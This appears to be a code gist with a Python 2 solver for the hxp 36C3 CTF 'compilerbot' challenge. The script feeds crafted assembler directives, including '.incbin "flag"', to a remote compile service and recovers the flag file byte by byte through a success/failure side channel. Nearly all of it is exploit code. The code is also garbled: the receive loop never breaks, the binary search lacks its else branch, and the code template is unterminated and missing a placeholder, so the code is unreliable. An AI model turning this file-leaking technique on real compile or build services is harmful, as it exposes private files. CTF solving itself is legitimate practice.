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Created December 31, 2019 01:42
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Solver for compilerbot challenge from hxp 36C3 CTF (misc/medium/256 pts/30 solves)
import socket
from base64 import b64encode, b64decode
from string import printable
def test(code):
host = ''
port = 8011
s = socket.create_connection((host, port))
s.sendall(b64encode(code) + '\n')
resp = ''
while True:
d = s.recv(4096)
if not d:
resp += d
return 'Not OK' not in resp
def test_suffix(suffix, tested_size):
code = r"""
".section .text.str1.1,\"aMS\",@progbits,1\n"
".global a\n"
".incbin \"flag\"\n"
".byte 0\n"
".global b\n"
".byte 0\n"
".section .text.asdf\n"
".global c\n"
".int %d+c\n"
".section .text\n"
code = code % ('\\n'.join(['.byte %d' % ord(x) for x in suffix]), tested_size)
return test(code)
if __name__ == '__main__':
# Find size after merge using binsearch
# Looks for the largest value which returns true. Invariant: result should be in [a, b].
a = 0x00000000
b = 0xffffffff
while a < b:
print 'progress: %08x - %08x' % (a, b)
mid = (a + b) / 2
if test_suffix('}\n', mid):
a = mid + 1
b = mid
size_after_merge = 2**32 - a
print 'size after merge: %08x' % size_after_merge
flag = '\n'
while not flag.startswith('hxp'):
for guess in printable:
if test_suffix(guess + flag, 2**32 - size_after_merge - 1):
flag = guess + flag
print 'flag:', flag.strip()
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